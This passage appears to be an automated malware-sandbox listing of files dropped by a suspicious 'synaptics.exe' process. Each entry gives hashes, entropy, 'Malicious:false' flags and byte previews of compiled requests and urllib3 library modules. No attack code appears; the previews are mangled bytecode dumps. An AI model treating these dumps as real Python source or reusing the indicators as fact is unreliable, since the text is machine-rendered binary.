                                                                                                                                                                                      SHA-512:CF264312DB520424C9DD95B1D22EE13D1917C36006F731EDB1E4B1E98590D2FAA72101799D91889770B427CFAE98582C5A3DE4FE249558E3699F8AA2BFDE35AD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f.........................@...s....d.a.d.d.l.m.Z...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..d#d$..i.d%d&..d'd(..d)d*..d+d,..d-d...d/d0..d1d2..d3d4..d5d6..d7d8..d9d:..d;d<..d=d>..d?d@..dAdB..dCdD..dEdF....i.dGdH..dIdJ..dKdL..dMdN..dOdP..dQdR..dSdT..dUdV..dWdX..dYdZ..d[d\..d]d^..d_d`..dadb..dcdd..dedf..dgdh....i.didj..dkdl..dmdn..dodp..dqdr..dsdt..dudv..dwdx..dydz..d{d|..d}d~..d.d...d.d...d.d...d.d...d.d...d.d.....Z.e.d.d...Z.d.d...Z.e.....d.S.).a.....The ``codes`` object defines a mapping from common names for HTTP statuses.to their numerical codes, accessible either as attributes or as dictionary.items...Example::.. >>> import requests. >>> requests.codes['temporary_redirect']. 307. >>> requests.codes.teapot. 418. >>> requests.codes['\o/']. 200..Some codes have multiple names, and both upper- and lower-case versions of.the names are allowed. For example, ``codes.ok``, ``codes.OK``, and.``codes.okay
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4406
                                                                                                                                                                                      Entropy (8bit):5.100867179309283
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:2VEvJgabXXYS+hwKMGZG3h+VLTovFx0qjax7evl:2UJrbXX3wtEhL39
                                                                                                                                                                                      MD5:A4250A667A125606DED27316DB2877A6
                                                                                                                                                                                      SHA1:013244A2ECAC89AC5E829833A2D92901ECE016A0
                                                                                                                                                                                      SHA-256:3DE411CCF88C8881092361887C7D2D5BE02208FFE78674E0200873111513D9CF
                                                                                                                                                                                      SHA-512:CD1C923644D1E6D17B646BC1B36237D0FBC7BADAD5098428E4EB4CB18FC302A084F4FA1226FD039AC56DFD955D42648F7411DAA343362BF85247A2223BE958F4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..f`........................@...sD...d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).zO.requests.structures.~~~~~~~~~~~~~~~~~~~..Data structures that power Requests.......)...OrderedDict.....)...Mapping..MutableMappingc....................@...sb...e.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...CaseInsensitiveDicta....A case-insensitive ``dict``-like object... Implements all methods and operations of. ``MutableMapping`` as well as dict's ``copy``. Also. provides ``lower_items``... All keys are expected to be strings. The structure remembers the. case of the last key to be set, and ``iter(instance)``,. ``keys()``, ``items()``, ``iterkeys()``, and ``iteritems()``. will contain case-sensitive keys. However, querying and contains. testing is case insensitive::.. cid = CaseInsensitiveDict(). cid['Accept'] = 'application/json'. cid['aCCEPT'] == 'application/json'
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):24594
                                                                                                                                                                                      Entropy (8bit):5.589357337041435
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:dwAXYudd5j1OCC04lbTaUGMAuAWtNNMAMFFOCTGvq2iqkg+p/cdiGjYrUcszdvLk:dR/54lPaQxA2usCTGGZcdzTR5vLk
                                                                                                                                                                                      MD5:B3581C6AACFA935ECAFA3F8A7C3471AD
                                                                                                                                                                                      SHA1:22CFA4AF247A72FF4E844B5E67974B797860B3EB
                                                                                                                                                                                      SHA-256:5B5818E66E943541159FBD870F6EC21E5843344EBB0F217C54BB0D4F64E71421
                                                                                                                                                                                      SHA-512:FA38E8ABA87BD1810AB548E469C7AFEE62DB44B5DE1FDB876513448D335FE3F51C851806DAEE0495F0E13A76C2839B46857744A706CE2CAAAD5E1ED67CEDFB44
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......?..fS........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m Z!..d.d.l.m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,m-Z-m.Z.m/Z/..d.d.l0m1Z1..d.Z2e..3..Z4d.d.d...Z5d..6e..7d.e.d.d...d.......Z8e.j9d.k.r.d.d...Z:d.d...Z"d.d...Z;d.d ..Z<dtd"d#..Z=d$d%..Z>d&d'..Z?e.j@d(d)....ZAd*d+..ZBd,d-..ZCd.d/..ZDd0d1..ZEdtd2d3..ZFd4d5..ZGd6d7..ZHd8d9..ZId:d;..ZJd<d=..ZKd>d?..ZLd@dA..ZMdBdC..ZNeOdD..ZPdEdF..ZQdGdH..ZRdIdJ..ZSdKdL..ZTdMdN..ZUdOdP..ZVe.j@dQdR....ZWdSdT..ZXdudUdV..ZYdWdX..ZZdvdYdZ..Z[dwd\d]..Z\d^d_..Z]d`da..Z^db._dc..Z`e`dd..Zae`de..Zbdfdg..Zcdhdi..Zddjdk..Zedldm..Zfdndo..Zgdpdq..Zhdrds..Zid.S.)xz..requests.utils.~~~~~~~~~~~~~~..This module provides utility functions that are used within Requests.that are also useful for external consumption.......N)...OrderedDict)...make_headers..parse_url..
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6094
                                                                                                                                                                                      Entropy (8bit):5.51245559135819
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:h/KVMbgcD9Q0jnBw/lM2oAH7KR2RPRlcLJCuhvPFor70S1lDhzQwePa/vpy6hqbh:4VIgchjjneTXCFCuh8NlBTePE4RrH
                                                                                                                                                                                      MD5:06D124B2BCF6CDFD866322D184CA9235
                                                                                                                                                                                      SHA1:AEE384D25509155E23332AD0324AAFB99601C73D
                                                                                                                                                                                      SHA-256:CBA6121AA3324F3F161131724B8B6803C14DE5C5420E6F1234E853E462918D1F
                                                                                                                                                                                      SHA-512:5FEA5AC6E9E185B7FA73A150D8D3A1E1EE6AA08DE3E964A93AA2F745E48ED960E08E91E006608A4D014E09F2C6A7B5097C7A1B1AE9AC3ACAADF21F91E583AD25
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..fC........................@...s....d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#..z.d.d.l$Z$W.n...e%y{......Y.n"w.e$j&.'d...s.e..(d.e$j&..d...e.j)....n.e$j*d.k.r.e%d.e$j&..d.......d.Z+d.Z,e.Z.d.Z-e...e/...0e.......e.j1f.dBd.d...Z2[.e.j3d.e.j4d d!....e.j3d"e.j5d d!....e.j6f.dCd&d'..Z7e...Z8d.d.d.d d d d.d(d.d)..dDd>d?..Z9e.j:d@k.r.d.dAl;m<Z<..e<....d.S.d.S.)Eze.Python HTTP library with thread-safe connection pooling, file post support, user friendly, and more......)...annotationsN)...NullHandler.....)...exceptions)..._TYPE_BODY)...HTTPHeaderDict)...__version__)...HTTPConnectionPool..HTTPSConnectionPool..connection_from_url)..._TYPE_FIELDS..encode_multipart_formdata)...PoolManager..ProxyManager..proxy_from_url)...BaseHTTPResponse..HTTPResponse)...make_headers)...Retry)...Timeoutz.OpenSSL zUurllib3 v2 only suppo
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5669
                                                                                                                                                                                      Entropy (8bit):5.123098275388025
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:+c/rlSd/T49ElnxsGaqlYrxg5BLYrrN/jFV/5/iWb01GJwIGdP2vI5PAv/Atd2Nq:7zlSd/89El98SGrpn5/iWb01GJBvI5Px
                                                                                                                                                                                      MD5:D04B6BAC4F22581ADCE04C94A77E3CB0
                                                                                                                                                                                      SHA1:5C2D27A8E2EB461FD5FB3A6685D68602A4D16E8F
                                                                                                                                                                                      SHA-256:86E8FA998CD4174BC867C67A48F12C1BCF072A69D35A463BF7B3A759A01D3F88
                                                                                                                                                                                      SHA-512:B4D7A7CEDB1D604181526FCF0451CD5D413568BAA3870974EAA74B6E38ACCC17A1C75BBA29F9B3D51C9DEF4D8DEA7A857BFD3E794A6CEFF0463673A306D5CE54
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.j.e.e.j.e.j...e.j.e...e.f...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.e.j.rfd.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e.e...Z.d.S.d.S.)......)...annotationsN.....)..._TYPE_SOCKET_OPTIONS)..._DEFAULT_TIMEOUT.._TYPE_TIMEOUT)...Urlc....................@...s....e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)...ProxyConfig..ssl.SSLContext | None..ssl_context..boolZ.use_forwarding_for_https."None | str | typing.Literal[False]..assert_hostname..str | None..assert_fingerprintN....__name__..__module__..__qualname__..__annotations__..r....r.....JC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\_base_connection.pyr........s..............r....c....................@...s6...e.Z.d.Z.U.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.e.d.<.d.S.)..._ResponseOptions..strZ.request_methodZ.request_urlr......preload_content..decode_content..enforce_content_lengthNr....r....r....r....r....r........
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16235
                                                                                                                                                                                      Entropy (8bit):5.258657499941966
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:FWFpjR4qRg8OGlm9VP0Zxfl9Zg2j142c84ll4OERj4T/gW9lYyscf:Maf8O4m9VPaxfS2Sl4ORTvNso
                                                                                                                                                                                      MD5:DE0E15935FEF3DE114FD33BA4C53C74F
                                                                                                                                                                                      SHA1:88558EFF98F1B3F71372E3F5FC4156C1076C6116
                                                                                                                                                                                      SHA-256:CF6EA84C1AF8BEAB4CF62076D1738FC05267E5DC54AEE2454BC029540A2981C2
                                                                                                                                                                                      SHA-512:714CE3E1E7638A7B1695097E2F3B49B9A2CC4E9A9503F79873F339FFD437625A9F9DC47CE2B9805D3C8EAA8F9F3E329C2AC43B75588A26790D634ABFDFBA8C5C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.C.......................@...s:...d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.j.r5d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d.g.Z.e...d...Z.e...d...Z.e...d...Z.e.j.d.e.j.e.e.f...e.j.e.j.e.e.f.....d.f...Z.G.d.d...d.e...Z.d.d.d...Z.G.d.d...d.e.j.e.e.f...e.j.e.e.f.....Z.G.d.d...d.e.j.e.j.e.e.f.......Z G.d.d...d.e.j.e.e.f.....Z!d.S.)......)...annotationsN)...OrderedDict)...Enum..auto)...RLock)...Protocol)...Selfc....................@...s ...e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.S.)...HasGettableStringKeys..return..typing.Iterator[str]c....................C........d.S...N......selfr....r.....FC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\_collections.py..keys...........z.HasGettableStringKeys.keys..key..strc....................C...r....r....r......r....r....r....r....r......__getitem__....r....z!HasGettableStringKeys.__getitem__N..r....r......r....r....r....r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r........s..........r......Rece
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9078
                                                                                                                                                                                      Entropy (8bit):5.256602021808529
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:zR6oSXCyeq9B8lhwzOcHtKtABQSMSrcMmh:d6oeMq9H6cHTBBMSrcMmh
                                                                                                                                                                                      MD5:7A09D6D591917E7F6EB646BDA5BCBD8C
                                                                                                                                                                                      SHA1:843CC485ECD469B7C0A07D5CDA245A1A7A78C60E
                                                                                                                                                                                      SHA-256:534B6BEAB41FCA026134B1662D1A530F5B8DA9B21A40A55337720C71DC0CD64E
                                                                                                                                                                                      SHA-512:7AEF24B818EDF514F05EE9C9408B153001AA16ED6CF1FBC4892614369D90D00EDE781CAD3C1A27C62D63379D4FAB0E6BE99925BE2D7D149EB0183C3B74BBA403
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.&.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.g.Z.e.j.e.j.e.j.e.e.j.e.e.f...f.....e.j.e.e.j.e.e.f...f...f...Z.G.d.d...d...Z.d.S.)......)...annotationsN)...urlencode.....)..._TYPE_BODY)...HTTPHeaderDict)..._TYPE_FIELDS..encode_multipart_formdata)...BaseHTTPResponse..RequestMethodsc....................@...sp...e.Z.d.Z.d.Z.h.d...Z.d%d&d.d...Z.........d'd(d.d...Z.........d)d*d.d...Z.....d+d,d!d"..Z.........d'd-d#d$..Z.d.S.).r....a..... Convenience mixin for classes who implement a :meth:`urlopen` method, such. as :class:`urllib3.HTTPConnectionPool` and. :class:`urllib3.PoolManager`... Provides behavior for making common types of HTTP request methods and. decides which type of request field encoding to use... Specifically,.. :meth:`.request_encode_url` is for sending requests whose fields are. encoded in the URL (such as GET, HEAD, DELETE)... :meth:`.request_encode_body`
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):482
                                                                                                                                                                                      Entropy (8bit):5.37584384201802
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:y/CvlYN5ltyLSbBjz/8Ck4w3u5r3PyNAQ9AFtHzFAGhRvsx2c6m87lE/uaHxEM9U:CuKjR85Yr3auej47+tlHiZ8I4srEkJ
                                                                                                                                                                                      MD5:0F4EE7ECC484C06D97F93383D8FA1241
                                                                                                                                                                                      SHA1:F338255EA7522B82FEEA18F76E7D359CB7216FAF
                                                                                                                                                                                      SHA-256:97EAF962ECCE5775E05C4A661D780EB6535AFDEE49735507E28ECBFDB50AA742
                                                                                                                                                                                      SHA-512:28EDE540AEEBE279D471E7165E9A06F34936B93B5EB4D211FFC0512EB10EF6C537F0767A7345D086705CD5570E50C64C9D59881D858FC12BA092522290A68785
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.........................@...sh...U.d.Z.e.r.d.d.l.m.Z.m.Z...e.e.e.e.f...d.f...Z.n.e.Z.e.e.d.<.e.e.d.<.e.e.d.<.e.e.d.<.d...Z.Z.d...Z.Z.d.S.).F.....)...Tuple..Union...version..__version__..__version_tuple__..version_tuplez.2.2.3)......r.........N)...TYPE_CHECKING..typingr....r......int..strZ.VERSION_TUPLE..object..__annotations__r....r....r....r......r....r.....BC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\_version.py..<module>....s..........................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):24011
                                                                                                                                                                                      Entropy (8bit):5.54051369732142
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:j3oRv1iEkiRj91RsJ0YTnenrRaBVIT7sgTbzXugzTBDERk4VypKsFVc56AnzeuqG:j3obrjRsJ0YTG6I8gniiJqYpn6QesG
                                                                                                                                                                                      MD5:8A0718FF18E2C0E8507FA134E55B1C01
                                                                                                                                                                                      SHA1:76C0CC286E05890DD3455299CFC28673FFD84CC1
                                                                                                                                                                                      SHA-256:0C5C94C7E236D06302614667CE77CCDCE3B3C3BAF35DE32940BA74A887445B98
                                                                                                                                                                                      SHA-512:83CFC190D7C2246DD4B11074F25FB911034F2E15F2164A32F0F95872511AD6A1B21E13DCA69D38C55F7432B8538027720FD8E9C38BCA990C557114B7582C8C43
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..fT........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.r[d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m Z ..d.d.l!m"Z"m#Z#m$Z$..d.d.l%m&Z&..d.d.l'm(Z(..z.d.d.l)Z)e)j*Z+W.n...e,e-f.y.......d.Z)G.d.d...d.e...Z+Y.n.w.d.d.l/m0Z0..d.d.l/m1Z1..d.d.l/m2Z2..d.d.l3m4Z4..d.d.l5m6Z6m7Z7m8Z8m9Z9m:Z:m;Z;..d.d.l<m=Z=m>Z>m?Z?m@Z@..d.d.lAmBZB..d.d.l.mCZD..d.d.l.mEZEmFZFmGZGmHZHmIZI..d.d.lJmKZKmLZL..d.d.lMmNZN..eOZOePZPe..QeR..ZSd.d.d ..ZTe..Ud!d"d...ZVe..Wd#..ZXeYe.d$..ZZG.d%d&..d&e...Z.G.d'd(..d(e...Z[G.d)d*..d*e.j\..Z]d+d,..d_dFdG..Z^.+d`dadNdO..Z_dbdTdU..Z`dcdVdW..ZaG.dXdY..dY..Zbe)..s[ebZ[e[Zc..ddded]d^..Zdd.S.)f.....)...annotationsN)...HTTPConnection)...HTTPException)...ResponseNotReady....timeout.........HTTPResponse)..._TYPE_PEER_CERT_RET_DICT)...SSLTransport)...HTTPHeaderDict)...probe)...assert_header_parsing)..._DEFAULT_TIMEOUT.._TYPE_TIME
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):29199
                                                                                                                                                                                      Entropy (8bit):5.44010337980193
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:mi2lI3Jti2pYtq6fBiKrzYIpKneR4TliLX1XkFCDD2rz8vIkwjYHklf8HvpnykHN:VBQ22tqUBi9eOTlfavNyke9aR
                                                                                                                                                                                      MD5:240B233FF73AD5F696A5DD22A1E8D155
                                                                                                                                                                                      SHA1:AC0ED190C833700B9E8B8093C501C46D57AAF66C
                                                                                                                                                                                      SHA-256:D2674F8EAAF8323FD1B9555CEA93E0B0575CE389DD70EA1C5D9F285525CEBA66
                                                                                                                                                                                      SHA-512:A65697B7AACFF382A155997122F4F8AC329732AFCB62602EF2457B376CEAECB63E5350ACC50E7EB218F42ABA3D7E947E9CEB6A52F3838F608E8080F39788CE04
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.........................@...sV...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(m)Z)m*Z*m+Z+..d.d.l,m-Z-..d.d.l.m/Z/..d.d.l0m1Z1..d.d.l2m3Z3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:m;Z;m<Z<..d.d.l=m>Z>m?Z?..d.d.l=m@ZA..d.d.l=mBZB..d.d.lCmDZD..e.jEr.d.d.lFZFd.d.lGmHZH..d.d.l.mIZImJZJ..e..KeL..ZMe.jNe<eOe;d.f...ZPG.d.d...d...ZQe.jRe.jSh.ZTG.d.d...d.eQe...ZUG.d.d...d.eU..ZVd6d$d%..ZWe.jXd7d*d+....Z@e.jXd8d,d+....Z@d9d-d+..Z@..d:d;d1d2..ZYd<d4d5..ZZd.S.)=.....)...annotationsN....timeout)...TracebackType.....)..._TYPE_BODY)...HTTPHeaderDict)...RequestMethods)...BaseSSLError..BrokenPipeError..DummyConnection..HTTPConnection..HTTPException..HTTPSConnection..ProxyConfig.._wrap_proxy_error)...port_by_scheme)...ClosedPoolError..EmptyPoolError..FullPoolError..HostChangedError..InsecureRequestWarning..Location
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13222
                                                                                                                                                                                      Entropy (8bit):4.954704588952758
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:sN0d2MCSNJR3aibXrLh86mCrEl7mRkUfLL2xEZiru/cc8fditjgsShRaE:sudfCSNJR3aibXrLh86frElCRvTCuUrj
                                                                                                                                                                                      MD5:97A33353F94B11B0469AEB20051DA0AC
                                                                                                                                                                                      SHA1:7EFF4501EF7E7F088B4CFEB5DDF1E7F95552A865
                                                                                                                                                                                      SHA-256:335E7AE06A7225F5B43A309D80AC91DF384F385240A5F914E5860ABFF62A3831
                                                                                                                                                                                      SHA-512:83456763FC7F49D92806CBB89DDA0931EA7EAFF3D002CB8AEFAD4171F564A744C4FF9634C900582798B1776A2C7D64B3AB3E895B831C14E96ADC4E3A7C73ADC6
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f.$.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.r9d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.G.d.d...d.e...Z.e.j.e.j.d.e.f...e.j.e.d.f...f...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z e Z!G.d.d...d.e...Z"G.d.d...d.e...Z#G.d.d ..d e...Z$G.d!d"..d"e...Z%G.d#d$..d$e%e...Z&G.d%d&..d&e%..Z'G.d'd(..d(e'e...Z(G.d)d*..d*e(..Z)G.d+d,..d,e...Z*G.d-d...d.e...Z+G.d/d0..d0e...Z,G.d1d2..d2e-e...Z.G.d3d4..d4e...Z/G.d5d6..d6e...Z0G.d7d8..d8e...Z1G.d9d:..d:e...Z2G.d;d<..d<e2..Z3G.d=d>..d>e2..Z4G.d?d@..d@e2..Z5G.dAdB..dBe2..Z6G.dCdD..dDe...Z7G.dEdF..dFe e-..Z8G.dGdH..dHe...Z9G.dIdJ..dJe.e...Z.G.dKdL..dLe.e...Z:G.dMdN..dNe...Z;G.dOdP..dPe<e0..Z=G.dQdR..dRe-..Z>G.dSdT..dTe...Z?G.dUdV..dVe...Z@d.S.)W.....)...annotationsN)...MessageDefect)...IncompleteRead.....)...HTTPConnection)...ConnectionPool)...HTTPResponse)...Retryc....................@........e.Z.d.Z.d.Z.d.S.)...HT
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9704
                                                                                                                                                                                      Entropy (8bit):5.404908079884945
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:toIkKH+iSdmq+qOqLpEzqkUS47qJKqtPAK/qPdqqBSqqP:tBkKH+iSIq+qOqLOzqA47qJKqtPAK/q+
                                                                                                                                                                                      MD5:853CED57AE0047D732F85FD1B692B694
                                                                                                                                                                                      SHA1:A2EF627D210A96608D4FC4D0BC45DFA043D6718C
                                                                                                                                                                                      SHA-256:7A8020BE9878FCBE563CE7C7416AA9EB1F6C0E6E74350F28DA77EDE2FA2592E5
                                                                                                                                                                                      SHA-512:D85C023D0EB65B1B6753A89045D74837ACE4E4610BE0E833AD29561D84B606BD710342A16023763CCC18ACD357F7740CE599BE59FBF780028AE0F5A062DE3274
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f[*.......................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j.e.e.f...Z.e.j.e.e.j.e.e.f...e.j.e.e.e.f...f...Z...d.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.G.d.d...d...Z.d.S.)......)...annotationsN..application/octet-stream..filename..str | None..default..str..returnc....................C...s....|.r.t...|...d...p.|.S.|.S.).z.. Guess the "Content-Type" of a file... :param filename:. The filename to guess the "Content-Type" of using :mod:`mimetypes`.. :param default:. If no "Content-Type" can be guessed, default to `default`.. r....)...mimetypes..guess_type).r....r......r.....@C:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\fields.py..guess_content_type....s..........r......name..value.._TYPE_FIELD_VALUEc........................s....d.d.l.}.|.j.d.t.d.d.....t...t...r.....d.....t...f.d.d...d.D.....s=|...d.....d...}.z.|...d.....W.|.S...t.t.f.y<......Y.n.w.t.j.....d.....|...d...........S.).a..... Helper function to format an
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2334
                                                                                                                                                                                      Entropy (8bit):5.59278465798021
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:hL1hfLSsUyrfcuCKwlb9BEA2GS8FD5yHbVz:tLSsxc59TEA2CDUHbx
                                                                                                                                                                                      MD5:BE080BCCBD62F8E499C5B555FFA63504
                                                                                                                                                                                      SHA1:0FD9C24FA66E1D8814C47A3C914B8AEA7EC11545
                                                                                                                                                                                      SHA-256:406E930151BD12C4997D43EA96BAA69A8905BE5923A681E571A3471B544565B3
                                                                                                                                                                                      SHA-512:116E07FEFB463B7D562F310AC7C7364E0EC1F4AA88169BDE9C88F71AD9DEB912EE8268B5834609314F81E250006FED747CE34AF9774DD3DA1B319806A9DD79B2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......=..f[........................@...s....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...e...d...d...Z.e.j.e.j.e.j.e.e.f...e.f.....Z.e.j.e.e.j.e.e.f...f...Z.d.d.d...Z.d.d.d...Z...d.d.d.d...Z.d.S.)......)...annotationsN)...BytesIO.....)..._TYPE_FIELD_VALUE_TUPLE..RequestFieldz.utf-8.......return..strc....................C...s....t...t...d.........S.).zN. Our embarrassingly-simple replacement for mimetools.choose_boundary.. .....)...binascii..hexlify..os..urandom..decode..r....r.....BC:\Users\Public\QExvbmVOb25l\lib\site-packages\urllib3\filepost.py..choose_boundary....s......r......fields.._TYPE_FIELDS..typing.Iterable[RequestField]c....................c...sH.....t.|.t.j...r.|.....}.n.|.}.|.D.].}.t.|.t...r.|.V...q.t.j.|...V...q.d.S.).z.. Iterate over fields... Supports list of (k, v) tuples and dicts, and lists of. :class:`~urllib3.fields.RequestField`... N)...isinstance..typing..Mapping..itemsr....Z.from_tuples).r......iterable..fieldr....
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):18190
